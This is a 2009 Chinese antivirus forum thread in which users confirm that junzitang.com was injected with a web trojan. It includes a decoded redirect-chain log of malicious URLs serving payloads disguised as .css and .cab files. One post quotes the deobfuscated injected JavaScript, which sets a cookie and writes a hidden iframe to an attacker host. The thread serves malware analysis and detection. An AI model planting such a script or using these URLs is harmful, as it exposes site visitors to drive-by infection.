12
返回列表 发新帖
楼主: marsszp49
收起左侧

[已鉴定] [这个网好像被挂马了]www.junzitang.com[挂马][已检测by aarwwefdds]

[复制链接]
250662772
发表于 2009-1-30 14:41:21 | 显示全部楼层
确实挂了
http://www.ailyes.cn/b073399/14.htm
http://www.ailyes.cn/new.js
http://qq.18i16.net/exe1/b07.css
雨宫优子
发表于 2009-1-30 14:42:53 | 显示全部楼层
关于:hxxp://www.junzitang.com/解密的日志(全体输出-  29):

Level 0>http://www.junzitang.com/
Level 1>http://www.junzitang.com/menu.js
Level 1>http://www.junzitang.com/scripts/common.js
Level 2>http://www.ailyes.cn/b073399/cqvip.htm
Level 3>http://www.ailyes.cn/b073399/new.html
Level 4>http://www.ailyes.cn/cx.htm
Level 5>http://www.ailyes.cn/cx.js
Level 6>http://121.12.173.218/exe1/cx.css  ●
Level 4>http://www.ailyes.cn/b073399/fx.htm
Level 5>http://www.ailyes.cn/b073399/xlink.html
Level 5>http://www.ailyes.cn/b073399/mlink.html
Level 4>http://www.ailyes.cn/new.js
Level 5>http://qq.18i16.net/baidu.cab  ●
Level 4>http://www.ailyes.cn/real11.htm
Level 5>http://www.ailyes.cn/realplay.js
Level 6>http://qq.18i16.net/exe1/real11.css  ●
Level 4>http://www.ailyes.cn/real10.htm
Level 5>http://qq.18i16.net/exe1/re.css  ●
Level 4>http://www.ailyes.cn/bfyy.htm
Level 5>http://www.ailyes.cn/bf.js
Level 6>http://qq.18i16.net/exe1/bf.css  ●
Level 4>http://www.ailyes.cn/lzz.htm
Level 5>http://www.ailyes.cn/lzz.js
Level 6>http://qq.18i16.net/exe1/lzz.css  ●
Level 4>http://www.ailyes.cn/b073399/14.htm
Level 5>http://qq.18i16.net/exe1/b07.css  ●
Level 4>http://www.ailyes.cn/as.htm
Level 1>http://www.junzitang.com/scripts/jquery.js
Level 1>http://js.tongji.yahoo.com.cn/0/47/463/ystat.js

Log by aarwwefdds
雨宫优子
发表于 2009-1-30 14:43:50 | 显示全部楼层
原帖由 250662772 于 2009-1-30 14:41 发表
确实挂了
http://www.ailyes.cn/b073399/14.htm
http://www.ailyes.cn/new.js
http://qq.18i16.net/exe1/b07.css

真够省力的....
解密还是实在点好...
marsszp49
 楼主| 发表于 2009-1-30 14:46:56 | 显示全部楼层
是不是www.junzitang.com上没有挂马,而是弹出的网页上有毒?我后来又上了几次,红伞都没报
雨宫优子
发表于 2009-1-30 14:54:09 | 显示全部楼层
原帖由 marsszp49 于 2009-1-30 14:46 发表
是不是www.junzitang.com上没有挂马,而是弹出的网页上有毒?我后来又上了几次,红伞都没报

不是,挂马的脚本有COOKIE检测,第二次上挂马的网页,脚本检测到有COOKIE,挂马的网页就不会起效..
taoyuan237
发表于 2009-1-30 14:56:56 | 显示全部楼层
原帖由 aarwwefdds 于 2009-1-30 14:54 发表

不是,挂马的网页有COOKIE检测,第二次上挂马的网页检测到有COOKIE,挂马的网页就不会起效..

我早上发现的时候解到Http://www.ailyes.cn/b073399/cqvip.htm这就解不下去了
2.jpg 好背啊
雨宫优子
发表于 2009-1-30 14:58:14 | 显示全部楼层
这段Script检测COOKIE:
function Get(){
var NaNGethBp1 = new window["Date"]()
NaNGethBp1["setTime"](NaNGethBp1["getTime"]() + 24*60*60*1000)
var AV2 = new window["String"](window["document"]["cookie"])
var RLmG3 = "Cookie1="
var RgmJDvsU4 = AV2["indexOf"](RLmG3)
if (RgmJDvsU4 != -1){
} else
{ window["document"]["cookie"] = "Cookie1=killav;expires="+ NaNGethBp1["toGMTString"]();
window["document"]["writeln"]("<iframe src=Http://www.ailyes.cn/b073399/cqvip.htm width=100 height=0></iframe> ");
}
}Get()
雨宫优子
发表于 2009-1-30 15:00:57 | 显示全部楼层
原帖由 taoyuan237 于 2009-1-30 14:56 发表

我早上发现的时候解到Http://www.ailyes.cn/b073399/cqvip.htm这就解不下去了
452823好背啊

话说这个“H”大写就会提示DNS Failed
谁叫这个Freshow脑筋不会急转弯啊...[:27:]
marsszp49
 楼主| 发表于 2009-1-30 17:08:03 | 显示全部楼层
谢谢,各位
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-12-17 10:51 , Processed in 0.094234 second(s), 16 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表